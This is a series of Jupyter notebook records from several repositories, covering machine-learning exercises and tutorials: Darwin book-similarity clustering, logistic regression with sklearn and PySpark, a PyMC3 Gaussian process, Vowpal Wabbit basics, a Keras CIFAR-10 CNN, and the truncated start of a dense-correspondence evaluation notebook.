landmark work.</p>", "_____no_output_____" ] ], [ [ "# This is needed to display plots in a notebook\n%matplotlib inline\n\n# Import libraries\nimport matplotlib.pyplot as plt\n\n# Select the column corresponding to \"On the Origin of Species\" and \nv = ...\n\n# Sort by ascending scores\nv_sorted = ...\n\n# Plot this data has a horizontal bar plot\n# ... YOUR CODE FOR TASK 11 ...\n\n# Modify the axes labels and plot title for a better readability\n# ... YOUR CODE FOR TASK 11 ...", "_____no_output_____" ] ], [ [ "## 12. Which books have similar content?\n<p>This turns out to be extremely useful if we want to determine a given book's most similar work. For example, we have just seen that if you enjoyed \"<em>On the Origin of Species</em>,\" you can read books discussing similar concepts such as \"<em>The Variation of Animals and Plants under Domestication</em>\" or \"<em>The Descent of Man, and Selection in Relation to Sex</em>.\" If you are familiar with Darwin's work, these suggestions will likely seem natural to you. Indeed, <em>On the Origin of Species</em> has a whole chapter about domestication and <em>The Descent of Man, and Selection in Relation to Sex</em> applies the theory of natural selection to human evolution. Hence, the results make sense.</p>\n<p>However, we now want to have a better understanding of the big picture and see how Darwin's books are generally related to each other (in terms of topics discussed). To this purpose, we will represent the whole similarity matrix as a dendrogram, which is a standard tool to display such data. <strong>This last approach will display all the information about book similarities at once.</strong> For example, we can find a book's closest relative but, also, we can visualize which groups of books have similar topics (e.g., the cluster about Charles Darwin personal life with his autobiography and letters). If you are familiar with Darwin's bibliography, the results should not surprise you too much, which indicates the method gives good results. Otherwise, next time you read one of the author's book, you will know which other books to read next in order to learn more about the topics it addressed.</p>", "_____no_output_____" ] ], [ [ "# Import libraries\nfrom scipy.cluster import hierarchy\n\n# Compute the clusters from the similarity matrix,\n# using the Ward variance minimization algorithm\nZ = ...\n\n# Display this result as a horizontal dendrogram\n# ... YOUR CODE FOR TASK 12 ...", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72f48a859d658f1e5de96da87438e6a699fc568
5,602
ipynb
Jupyter Notebook
0022/quadgk.ipynb
genkuroki/public
339ea5dfd424492a6b21d1df299e52d48902de18
[ "MIT" ]
10
2021-06-06T00:33:49.000Z
2022-01-24T06:56:08.000Z
0022/quadgk.ipynb
genkuroki/public
339ea5dfd424492a6b21d1df299e52d48902de18
[ "MIT" ]
null
null
null
0022/quadgk.ipynb
genkuroki/public
339ea5dfd424492a6b21d1df299e52d48902de18
[ "MIT" ]
3
2021-08-02T11:58:34.000Z
2021-12-11T11:46:05.000Z
24.678414
153
0.508033
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
e72f6155e8960664705608e3353a36538c26ba38
7,094
ipynb
Jupyter Notebook
exercises/04_logistic_regression.ipynb
milroy/Spark-Meetup
172157e2ae9968b933a28eb590d4d6b8d2037d34
[ "MIT" ]
1
2015-11-12T19:38:24.000Z
2015-11-12T19:38:24.000Z
exercises/04_logistic_regression.ipynb
milroy/Spark-Meetup
172157e2ae9968b933a28eb590d4d6b8d2037d34
[ "MIT" ]
null
null
null
exercises/04_logistic_regression.ipynb
milroy/Spark-Meetup
172157e2ae9968b933a28eb590d4d6b8d2037d34
[ "MIT" ]
null
null
null
21.113095
98
0.53806
[ [ [ "# Logistic Regression", "_____no_output_____" ] ], [ [ "import numpy as np\nfrom sklearn import datasets\nfrom sklearn.utils import shuffle\n\nrandom_state = np.random.RandomState(0)\n\niris = datasets.load_iris()\nX = iris.data\ny = iris.target\n\nprint y", "_____no_output_____" ], [ "import seaborn as sns\n\n%matplotlib inline\niris_sns = sns.load_dataset(\"iris\")\n\ng = sns.PairGrid(iris_sns)\ng.map_diag(sns.kdeplot)\ng.map_offdiag(sns.kdeplot, cmap=\"Blues_d\", n_levels=6);\nsns.plt.show()", "_____no_output_____" ] ], [ [ "#### Make it a binary classification problem by removing the first class", "_____no_output_____" ] ], [ [ "X, y = X[y != 0], y[y != 0]\nn_samples, n_features = X.shape\n\ny[y==1] = 0\ny[y==2] = 1", "_____no_output_____" ], [ "print X.shape, y.shape\nprint set(y)", "_____no_output_____" ] ], [ [ "## Using `sklearn`", "_____no_output_____" ] ], [ [ "from sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.cross_validation import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\nclf = LogisticRegression()\nclf.fit(X_train,y_train)\ny_pred_test = clf.predict(X_test)\ny_pred_train = clf.predict(X_train)\nprint accuracy_score(y_train, y_pred_train)\nprint accuracy_score(y_test, y_pred_test)", "_____no_output_____" ] ], [ [ "## Save to file", "_____no_output_____" ] ], [ [ "print y_train.shape\nprint y_train.reshape(y_train.shape[0],1).shape\nprint X_train.shape\ncX = np.concatenate((y_train.reshape(80,1), X_train), axis=1)\ncX.shape", "_____no_output_____" ] ], [ [ "Write to file....", "_____no_output_____" ] ], [ [ "np.savetxt('iris_train.csv', cX, delimiter=' ', fmt='%0.4f')\n!head iris_train.csv", "_____no_output_____" ], [ "cX = np.concatenate((y_test.reshape(len(y_test),1), X_test), axis=1)\nnp.savetxt('iris_test.csv', cX, delimiter=' ', fmt='%0.4f')", "_____no_output_____" ] ], [ [ "## With `Spark`", "_____no_output_____" ] ], [ [ "import findspark\nimport os\nfindspark.init() # you need that before import pyspark.\n\nimport pyspark\nsc = pyspark.SparkContext()", "_____no_output_____" ], [ "points = sc.textFile('../data/iris_train.csv', 18)\npoints.take(5)", "_____no_output_____" ], [ "from pyspark.mllib.classification import LogisticRegressionWithSGD\nfrom pyspark.mllib.classification import LabeledPoint \n\nparsed_data = points.map(lambda line: np.array([float(x) for x in line.split(' ')]))\nparsed_data = parsed_data.map(lambda arr: LabeledPoint(arr[0],arr[1:]))\n\nprint type(parsed_data)\nparsed_data.take(1)", "_____no_output_____" ], [ "model = LogisticRegressionWithSGD.train(parsed_data)", "_____no_output_____" ] ], [ [ "Any idea about the \"Cleaned shuffle\" messages?\nHint: narrow versus wide transformations.", "_____no_output_____" ] ], [ [ "y = parsed_data.map(lambda x: x.label)\ny_pred = parsed_data.map(lambda x: model.predict(x.features))", "_____no_output_____" ], [ "tmp = y.zip(y_pred)\ntmp.take(5)", "_____no_output_____" ] ], [ [ "Training accuracy", "_____no_output_____" ] ], [ [ "1.0 - tmp.filter(lambda (y, p): y!=p).count()/float(parsed_data.count())", "_____no_output_____" ] ], [ [ "Test accuracy", "_____no_output_____" ] ], [ [ "points = sc.textFile('../data/iris_test.csv', 18)\nparsed_data = points.map(lambda line: np.array([float(x) for x in line.split(' ')]))\nparsed_data = parsed_data.map(lambda arr: LabeledPoint(arr[0],arr[1:]))\ny_pred = parsed_data.map(lambda x: model.predict(x.features))\ny = parsed_data.map(lambda x: x.label)\ntmp = y.zip(y_pred)\n1.0 - tmp.filter(lambda (y, p): y!=p).count()/float(parsed_data.count())", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72f64c325b9c46b07c81d0a18ba906be8893ef7
3,581
ipynb
Jupyter Notebook
content/downloads/notebooks/Gaussian_process.ipynb
BlastingJavier/BlastingJavier.github.io
44620e80bb8ffa20d9ddb0b73a05ff184f24a98c
[ "MIT" ]
null
null
null
content/downloads/notebooks/Gaussian_process.ipynb
BlastingJavier/BlastingJavier.github.io
44620e80bb8ffa20d9ddb0b73a05ff184f24a98c
[ "MIT" ]
null
null
null
content/downloads/notebooks/Gaussian_process.ipynb
BlastingJavier/BlastingJavier.github.io
44620e80bb8ffa20d9ddb0b73a05ff184f24a98c
[ "MIT" ]
null
null
null
49.054795
1,443
0.610723
[ [ [ "import numpy as np\nimport pymc3 as pm\n\n# A one dimensional column vector of inputs.\nX = np.linspace(0, 1, 10)[:,None]\n\nwith pm.Model() as marginal_gp_model:\n # Specify the covariance function.\n cov_func = pm.gp.cov.ExpQuad(1, ls=0.1)\n\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.Marginal(cov_func=cov_func)\n\n # The scale of the white noise term can be provided,\n sigma = pm.HalfCauchy(\"sigma\", beta=5)\n y_ = gp.marginal_likelihood(\"y\", X=X, y=y, noise=sigma)\n\n # OR a covariance function for the noise can be given\n # noise_l = pm.Gamma(\"noise_l\", alpha=2, beta=2)\n # cov_func_noise = pm.gp.cov.Exponential(1, noise_l) + pm.gp.cov.WhiteNoise(sigma=0.1)\n # y_ = gp.marginal_likelihood(\"y\", X=X, y=y, noise=cov_func_noise)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code" ] ]
e72f8aeafb30c578390ee850c5e246d75cc23ea3
4,399
ipynb
Jupyter Notebook
python/docs/source/tutorials/python_first_steps.ipynb
jonpsy/vowpal_wabbit
9019232f4582e9b70be0e711fd94a27b12691eb3
[ "BSD-3-Clause" ]
null
null
null
python/docs/source/tutorials/python_first_steps.ipynb
jonpsy/vowpal_wabbit
9019232f4582e9b70be0e711fd94a27b12691eb3
[ "BSD-3-Clause" ]
null
null
null
python/docs/source/tutorials/python_first_steps.ipynb
jonpsy/vowpal_wabbit
9019232f4582e9b70be0e711fd94a27b12691eb3
[ "BSD-3-Clause" ]
null
null
null
32.585185
316
0.633098
[ [ [ "# Python Basics\n\nThis tutorial is a quick introduction to training and testing your model with Vowpal Wabbit using Python. We explore passing some data to Vowpal Wabbit to learn a model and get a prediction.\n\nFor more advanced Vowpal Wabbit tutorials, including how to format data and understand results, see [Tutorials](https://vowpalwabbit.org/tutorials.html).\n\n```{admonition} Prerequisites\nTo install Vowpal Wabbit see [Get Started](https://vowpalwabbit.org/start.html).\n```\n\n## Getting started\n\nFirst, import the [Vowpal Wabbit Python package](https://github.com/VowpalWabbit/vowpal_wabbit/tree/master/python) for this tutorial:\n", "_____no_output_____" ] ], [ [ "from vowpalwabbit import pyvw", "_____no_output_____" ] ], [ [ "Next, we create an instance of Vowpal Wabbit, and pass the `quiet=True` option to avoid diagnostic information output to `stdout` location:", "_____no_output_____" ] ], [ [ "model = pyvw.vw(quiet=True)", "_____no_output_____" ] ], [ [ "## Training scenario and dataset\n\nFor this tutorial scenario, we want Vowpal Wabbit to help us predict whether or not our house will require a new roof in the next 10 years.\n\nTo create some examples, we use the Vowpal Wabbit text format and then learn on them:", "_____no_output_____" ] ], [ [ "train_examples = [\n \"0 | price:.23 sqft:.25 age:.05 2006\",\n \"1 | price:.18 sqft:.15 age:.35 1976\",\n \"0 | price:.53 sqft:.32 age:.87 1924\",\n]\n\nfor example in train_examples:\n model.learn(example)", "_____no_output_____" ] ], [ [ "> **Note:** For more details on Vowpal Wabbit input format and feature hashing techniques see the [Linear Regression Tutorial](cmd_linear_regression.md).\n\nNow, we create a `test_example` to use for prediction:", "_____no_output_____" ] ], [ [ "test_example = \"| price:.46 sqft:.4 age:.10 1924\"\n\nprediction = model.predict(test_example)\nprint(prediction)", "_____no_output_____" ] ], [ [ "### Vowpal Wabbit results\n\nThe model predicted a value of **0**. According to our learning model, our house will not need a new roof in the next 10 years (at least that is the result from just three examples we used in our training dataset).\n\n## More to explore\n\n- To learn how to approach a contextual bandits problem using Vowpal Wabbit — including how to work with different contextual bandits approaches, how to format data, and understand the results — see the [Contextual Bandit Reinforcement Learning Tutorial](python_Contextual_bandits_and_Vowpal_Wabbit.ipynb).\n- For more on the contextual bandits approach to reinforcement learning, including a content personalization scenario, see the [Contextual Bandit Simulation Tutorial](python_Simulating_a_news_personalization_scenario_using_Contextual_Bandits.ipynb).\n- See the [Linear Regression Tutorial](cmd_linear_regression.md) for a different look at the roof replacement problem and learn more about Vowpal Wabbit's format and understanding the results.\n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72f8ee23ad53692f13d408338a1f847390db478
56,127
ipynb
Jupyter Notebook
nb_ex4_2_cnn_cifar10_cl.ipynb
jskDr/keraspp_2022
e10f4f849ad6a7354a05084e2cd9cec8acd62ef2
[ "MIT" ]
null
null
null
nb_ex4_2_cnn_cifar10_cl.ipynb
jskDr/keraspp_2022
e10f4f849ad6a7354a05084e2cd9cec8acd62ef2
[ "MIT" ]
null
null
null
nb_ex4_2_cnn_cifar10_cl.ipynb
jskDr/keraspp_2022
e10f4f849ad6a7354a05084e2cd9cec8acd62ef2
[ "MIT" ]
1
2022-03-29T13:15:22.000Z
2022-03-29T13:15:22.000Z
75.237265
31,498
0.759207
[ [ [ "## 4.3 컬러 이미지를 분류하는 CNN 구현\nCNN을 이용해 사진을 분류하는 방법을 다룹니다.\n\n### 4.3.1 분류 CNN 패키지 임포트", "_____no_output_____" ], [ "1. 필요한 패키지들을 임포트합니다.", "_____no_output_____" ] ], [ [ "from sklearn import model_selection, metrics\nfrom sklearn.preprocessing import MinMaxScaler", "_____no_output_____" ] ], [ [ "- 유용한 기능을 제공하는 다른 파이썬 패키지도 임포트합니다.", "_____no_output_____" ] ], [ [ "import numpy as np\nimport matplotlib.pyplot as plt\nimport os", "_____no_output_____" ] ], [ [ "- 케라스 모델링을 위한 서브패키지들을 불러옵니다.", "_____no_output_____" ] ], [ [ "from keras import backend as K\nfrom keras.utils import np_utils\nfrom keras.models import Model\nfrom keras.layers import Input, Conv2D, MaxPooling2D, Flatten, Dense, Dropout", "_____no_output_____" ] ], [ [ "- 케라스를 편리하게 사용하기 위해 여기서 만든 2가지 모듈을 불러옵니다.", "_____no_output_____" ] ], [ [ "from keraspp import skeras\nfrom keraspp import sfile", "_____no_output_____" ] ], [ [ "### 4.3.2 분류 CNN 모델링", "_____no_output_____" ], [ "2. 분류 CNN 모델링을 만듭니다.", "_____no_output_____" ] ], [ [ "# 2. 분류 CNN 모델링\nclass CNN(Model):\n def __init__(self, nb_classes): \n super(CNN,self).__init__() \n self.nb_classes = nb_classes\n \n self.conv2D_A = Conv2D(32, kernel_size=(3, 3), activation='relu')\n self.conv2D_B = Conv2D(64, (3, 3), activation='relu')\n self.maxPooling2D_A = MaxPooling2D(pool_size=(2, 2))\n self.dropout_A = Dropout(0.25)\n self.flatten = Flatten()\n \n self.dense_A = Dense(128, activation='relu')\n self.dropout_B = Dropout(0.5)\n self.dense_B = Dense(nb_classes, activation='softmax', name='preds')\n \n def call(self, x):\n h = self.conv2D_A(x)\n h = self.conv2D_B(h)\n h = self.maxPooling2D_A(h)\n h = self.dropout_A(h)\n h = self.flatten(h)\n\n h = self.dense_A(h)\n h = self.dropout_B(h)\n\n y = self.dense_B(h)\n \n return y", "_____no_output_____" ], [ "nb_classes = 10\nmodel = CNN(nb_classes=nb_classes)\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adadelta', metrics=['accuracy'])", "_____no_output_____" ] ], [ [ "### 4.3.3 분류 CNN을 위한 데이터 준비", "_____no_output_____" ], [ "3. 주어진 데이터를 해당 머신러닝에 사용하기 적합하도록 조정하는 기능을 하는 DataSet 클래스를 만듭니다.", "_____no_output_____" ] ], [ [ "# 3. 분류 CNN을 위한 데이터 준비\nclass DataSet:\n def __init__(self, X, y, nb_classes, scaling=True, \n test_size=0.2, random_state=0):\n self.X = X\n self.add_channels()\n X = self.X\n \n # the data, shuffled and split between train and test sets\n X_train, X_test, y_train, y_test = model_selection.train_test_split(\n X, y, test_size=0.2, random_state=random_state)\n\n print(X_train.shape, y_train.shape)\n\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n\n if scaling:\n # scaling to have (0, 1) for each feature (each pixel)\n scaler = MinMaxScaler()\n n = X_train.shape[0]\n X_train = scaler.fit_transform(\n X_train.reshape(n, -1)).reshape(X_train.shape)\n n = X_test.shape[0]\n X_test = scaler.transform(\n X_test.reshape(n, -1)).reshape(X_test.shape)\n self.scaler = scaler\n\n print('X_train shape:', X_train.shape)\n print(X_train.shape[0], 'train samples')\n print(X_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n Y_train = np_utils.to_categorical(y_train, nb_classes)\n Y_test = np_utils.to_categorical(y_test, nb_classes)\n\n self.X_train, self.X_test = X_train, X_test\n self.Y_train, self.Y_test = Y_train, Y_test\n self.y_train, self.y_test = y_train, y_test\n\n def add_channels(self):\n X = self.X\n\n if len(X.shape) == 3:\n N, img_rows, img_cols = X.shape\n\n if K.image_dim_ordering() == 'th':\n X = X.reshape(X.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n X = X.reshape(X.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n else:\n input_shape = X.shape[1:] # channel is already included.\n\n self.X = X\n self.input_shape = input_shape", "_____no_output_____" ], [ "from keras import datasets\n(X, y), (x_test, y_test) = datasets.cifar10.load_data()\nnb_classes = 10\ndata = DataSet(X, y, nb_classes)\nprint('data.input_shape', data.input_shape)", "(40000, 32, 32, 3) (40000, 1)\nX_train shape: (40000, 32, 32, 3)\n40000 train samples\n10000 test samples\ndata.input_shape (32, 32, 3)\n" ], [ "epochs=2\nbatch_size=128\nverbose=1\nhistory = model.fit(data.X_train, data.Y_train, \n batch_size=batch_size, epochs=epochs,\n verbose=verbose, \n validation_data=(data.X_test, data.Y_test))", "Epoch 1/2\n313/313 [==============================] - 47s 150ms/step - loss: 2.3076 - accuracy: 0.1087 - val_loss: 2.2870 - val_accuracy: 0.1377\nEpoch 2/2\n313/313 [==============================] - 49s 158ms/step - loss: 2.2918 - accuracy: 0.1227 - val_loss: 2.2746 - val_accuracy: 0.1754\n" ] ], [ [ "### 4.3.4 분류 CNN의 학습 및 성능 평가를 위한 머신 클래스", "_____no_output_____" ], [ "4. 학습 및 성능 평가를 쉽게 수행할 수 있는 상위 개념 클래스인 Machine을 만듭니다. ", "_____no_output_____" ] ], [ [ "# 4. 분류 CNN의 학습 및 성능 평가를 위한 머신 클래스\nclass Machine():\n def __init__(self, X, y, nb_classes=2, fig=True):\n self.nb_classes = nb_classes\n self.set_data(X, y)\n self.set_model()\n self.fig = fig\n\n def set_data(self, X, y):\n nb_classes = self.nb_classes\n self.data = DataSet(X, y, nb_classes)\n print('data.input_shape', self.data.input_shape)\n\n def set_model(self):\n nb_classes = self.nb_classes\n data = self.data\n self.model = CNN(nb_classes=nb_classes)\n self.model.compile(loss='categorical_crossentropy',\n optimizer='adadelta', metrics=['accuracy']) \n\n def fit(self, epochs=10, batch_size=128, verbose=1):\n data = self.data\n model = self.model\n\n history = model.fit(data.X_train, data.Y_train, \n batch_size=batch_size, epochs=epochs,\n verbose=verbose, \n validation_data=(data.X_test, data.Y_test))\n return history\n\n def run(self, epochs=100, batch_size=128, verbose=1):\n data = self.data\n model = self.model\n fig = self.fig\n\n history = self.fit(epochs=epochs,\n batch_size=batch_size, verbose=verbose)\n\n score = model.evaluate(data.X_test, data.Y_test, verbose=0)\n\n print('Confusion matrix')\n Y_test_pred = model.predict(data.X_test, verbose=0)\n y_test_pred = np.argmax(Y_test_pred, axis=1)\n print(metrics.confusion_matrix(data.y_test, y_test_pred))\n\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n\n # Save results\n suffix = sfile.unique_filename('datatime')\n foldname = 'output_' + suffix\n os.makedirs(foldname)\n skeras.save_history_history(\n 'history_history.npy', history.history, fold=foldname)\n model.save_weights(os.path.join(foldname, 'dl_model.h5'))\n print('Output results are saved in', foldname)\n\n if fig:\n plt.figure(figsize=(12, 4))\n plt.subplot(1, 2, 1)\n skeras.plot_acc(history)\n plt.subplot(1, 2, 2)\n skeras.plot_loss(history)\n plt.show()\n\n self.history = history\n\n return foldname", "_____no_output_____" ] ], [ [ "---\n### 4.3.5 분류 CNN을 처리하는 머쉰의 전체 코드", "_____no_output_____" ] ], [ [ "# File - keraspp/aicnn.py\n\n# 1. 분류 CNN 패키지 임포트 \nfrom sklearn import model_selection, metrics\nfrom sklearn.preprocessing import MinMaxScaler\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nfrom keras import backend as K\nfrom keras.utils import np_utils\nfrom keras.models import Model\nfrom keras.layers import Input, Conv2D, MaxPooling2D, Flatten, Dense, Dropout\n\nfrom keraspp import skeras\nfrom keraspp import sfile\n\n# 2. 분류 CNN 모델링\nclass CNN(Model):\n def __init__(self, nb_classes): #, in_shape=None):\n super(CNN,self).__init__() # added 2021-10-01\n self.nb_classes = nb_classes\n #self.in_shape = in_shape\n \n self.conv2D_A = Conv2D(32, kernel_size=(3, 3), activation='relu')\n self.conv2D_B = Conv2D(64, (3, 3), activation='relu')\n self.maxPooling2D_A = MaxPooling2D(pool_size=(2, 2))\n self.dropout_A = Dropout(0.25)\n self.flatten = Flatten()\n \n self.dense_A = Dense(128, activation='relu')\n self.dropout_B = Dropout(0.5)\n self.dense_B = Dense(nb_classes, activation='softmax', name='preds')\n \n def call(self, x):\n nb_classes = self.nb_classes\n # in_shape = self.in_shape\n\n #x = Input(in_shape)\n\n h = self.conv2D_A(x)\n h = self.conv2D_B(h)\n h = self.maxPooling2D_A(h)\n h = self.dropout_A(h)\n h = self.flatten(h)\n\n h = self.dense_A(h)\n h = self.dropout_B(h)\n\n y = self.dense_B(h)\n \n return y\n\n# 3. 분류 CNN을 위한 데이터 준비\nclass DataSet:\n def __init__(self, X, y, nb_classes, scaling=True, \n test_size=0.2, random_state=0):\n \"\"\"\n X is originally vector. Hence, it will be transformed\n to 2D images with a channel (i.e, 3D).\n \"\"\"\n self.X = X\n self.add_channels()\n\n X = self.X\n # the data, shuffled and split between train and test sets\n X_train, X_test, y_train, y_test = model_selection.train_test_split(\n X, y, test_size=0.2, random_state=random_state)\n\n print(X_train.shape, y_train.shape)\n\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n\n if scaling:\n # scaling to have (0, 1) for each feature (each pixel)\n scaler = MinMaxScaler()\n n = X_train.shape[0]\n X_train = scaler.fit_transform(\n X_train.reshape(n, -1)).reshape(X_train.shape)\n n = X_test.shape[0]\n X_test = scaler.transform(\n X_test.reshape(n, -1)).reshape(X_test.shape)\n self.scaler = scaler\n\n print('X_train shape:', X_train.shape)\n print(X_train.shape[0], 'train samples')\n print(X_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n Y_train = np_utils.to_categorical(y_train, nb_classes)\n Y_test = np_utils.to_categorical(y_test, nb_classes)\n\n self.X_train, self.X_test = X_train, X_test\n self.Y_train, self.Y_test = Y_train, Y_test\n self.y_train, self.y_test = y_train, y_test\n # self.input_shape = input_shape\n\n def add_channels(self):\n X = self.X\n\n if len(X.shape) == 3:\n N, img_rows, img_cols = X.shape\n\n if K.image_dim_ordering() == 'th':\n X = X.reshape(X.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n X = X.reshape(X.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n else:\n input_shape = X.shape[1:] # channel is already included.\n\n self.X = X\n self.input_shape = input_shape \n \n# 4. 분류 CNN의 학습 및 성능 평가를 위한 머신 클래스\nclass Machine():\n def __init__(self, X, y, nb_classes=2, fig=True):\n self.nb_classes = nb_classes\n self.set_data(X, y)\n self.set_model()\n self.fig = fig\n\n def set_data(self, X, y):\n nb_classes = self.nb_classes\n self.data = DataSet(X, y, nb_classes)\n print('data.input_shape', self.data.input_shape)\n\n def set_model(self):\n nb_classes = self.nb_classes\n data = self.data\n self.model = CNN(nb_classes=nb_classes)\n self.model.compile(loss='categorical_crossentropy',\n optimizer='adadelta', metrics=['accuracy']) \n\n def fit(self, epochs=10, batch_size=128, verbose=1):\n data = self.data\n model = self.model\n\n history = model.fit(data.X_train, data.Y_train, \n batch_size=batch_size, epochs=epochs,\n verbose=verbose, \n validation_data=(data.X_test, data.Y_test))\n return history\n\n def run(self, epochs=100, batch_size=128, verbose=1):\n data = self.data\n model = self.model\n fig = self.fig\n\n history = self.fit(epochs=epochs,\n batch_size=batch_size, verbose=verbose)\n\n score = model.evaluate(data.X_test, data.Y_test, verbose=0)\n\n print('Confusion matrix')\n Y_test_pred = model.predict(data.X_test, verbose=0)\n y_test_pred = np.argmax(Y_test_pred, axis=1)\n print(metrics.confusion_matrix(data.y_test, y_test_pred))\n\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n\n # Save results\n suffix = sfile.unique_filename('datatime')\n foldname = 'output_' + suffix\n os.makedirs(foldname)\n skeras.save_history_history(\n 'history_history.npy', history.history, fold=foldname)\n model.save_weights(os.path.join(foldname, 'dl_model.h5'))\n print('Output results are saved in', foldname)\n\n if fig:\n plt.figure(figsize=(12, 4))\n plt.subplot(1, 2, 1)\n skeras.plot_acc(history)\n plt.subplot(1, 2, 2)\n skeras.plot_loss(history)\n plt.show()\n\n self.history = history\n\n return foldname", "_____no_output_____" ] ], [ [ "### 4.3.6 분류 CNN의 학습 및 성능 평가 수행", "_____no_output_____" ], [ "5. 분류 CNN을 위한 머쉰에 기반하여 컬러 이미지를 분류합니다.", "_____no_output_____" ] ], [ [ "# 5. 분류 CNN의 학습 및 성능 평가 수행\nfrom keras import datasets\nimport keras\nassert keras.backend.image_data_format() == 'channels_last'\n\n# from keraspp import aicnn\nclass MyMachine(Machine):\n def __init__(self):\n (X, y), (x_test, y_test) = datasets.cifar10.load_data()\n super(MyMachine,self).__init__(X, y, nb_classes=10)\n\ndef main():\n m = MyMachine()\n m.run(epochs=2)\n\nmain()", "_____no_output_____" ] ], [ [ "---\n### 4.3.7 분류 CNN의 수행을 위한 전체 코드", "_____no_output_____" ] ], [ [ "# File - ex4_2_cnn_ficar10_cl-cpu.py\n\n# set to use CPU\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n\n# 5. 분류 CNN의 학습 및 성능 평가 수행\nfrom keras import datasets\nimport keras\nassert keras.backend.image_data_format() == 'channels_last'\nfrom keraspp import aicnn\n\n# from keraspp import aicnn\nclass MyMachine(aicnn.Machine):\n def __init__(self):\n (X, y), (x_test, y_test) = datasets.cifar10.load_data()\n super(MyMachine,self).__init__(X, y, nb_classes=10)\n\ndef main():\n m = MyMachine()\n m.run(epochs=2)\n\nmain()", "(40000, 32, 32, 3) (40000, 1)\nX_train shape: (40000, 32, 32, 3)\n40000 train samples\n10000 test samples\ndata.input_shape (32, 32, 3)\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72f9cc5db6020cb5856cc978756ef8a48c73b29
3,056
ipynb
Jupyter Notebook
dense_correspondence/evaluation/compute_descriptor_dataset_statistics.ipynb
jan-tgk/pytorch-dense-correspondence
7104f737768d34ad8eb6ff6aa65a01304c6a0e34
[ "BSD-3-Clause" ]
520
2018-06-25T00:46:38.000Z
2022-03-27T11:01:07.000Z
dense_correspondence/evaluation/compute_descriptor_dataset_statistics.ipynb
purplearrow/pytorch-dense-correspondence
584c934576342cf97d2f45777192f98118d2dfa7
[ "BSD-3-Clause" ]
66
2018-07-23T15:16:04.000Z
2021-08-10T13:40:25.000Z
dense_correspondence/evaluation/compute_descriptor_dataset_statistics.ipynb
purplearrow/pytorch-dense-correspondence
584c934576342cf97d2f45777192f98118d2dfa7
[ "BSD-3-Clause" ]
121
2018-06-26T13:52:03.000Z
2022-03-27T11:00:45.000Z
28.296296
110
0.611911
[ [ [ "## Compute descriptor statistics on dataset\nThis notebook computes the staistics of the descriptor on a given dataset", "_____no_output_____" ] ], [ [ "import numpy as np\nimport time\nimport os\nimport matplotlib.pyplot as plt\n\nimport dense_correspondence_manipulation.utils.utils as utils\nutils.add_dense_correspondence_to_python_path()\n\nfrom torchvision import transforms\nimport torch\n\nfrom dense_correspondence.dataset.spartan_dataset_masked import SpartanDataset\nfrom dense_correspondence.dataset.dense_correspondence_dataset_masked import ImageType\nfrom dense_correspondence.evaluation.evaluation import *\n\nDCE = DenseCorrespondenceEvaluation", "_____no_output_____" ], [ "%%javascript\nIPython.OutputArea.auto_scroll_threshold = 9999;", "_____no_output_____" ], [ "config_filename = os.path.join(utils.getDenseCorrespondenceSourceDir(), 'config', \n 'dense_correspondence', 'evaluation', 'evaluation.yaml')\nconfig = utils.getDictFromYamlFilename(config_filename)\ndefault_config = utils.get_defaults_config()\n\ndce = DenseCorrespondenceEvaluation(config)\n\n# Note: you must have a network with this name in your evaluation.yaml\nnetwork_name = \"caterpillar_3\"\ndcn = dce.load_network_from_config(network_name)\ndataset = 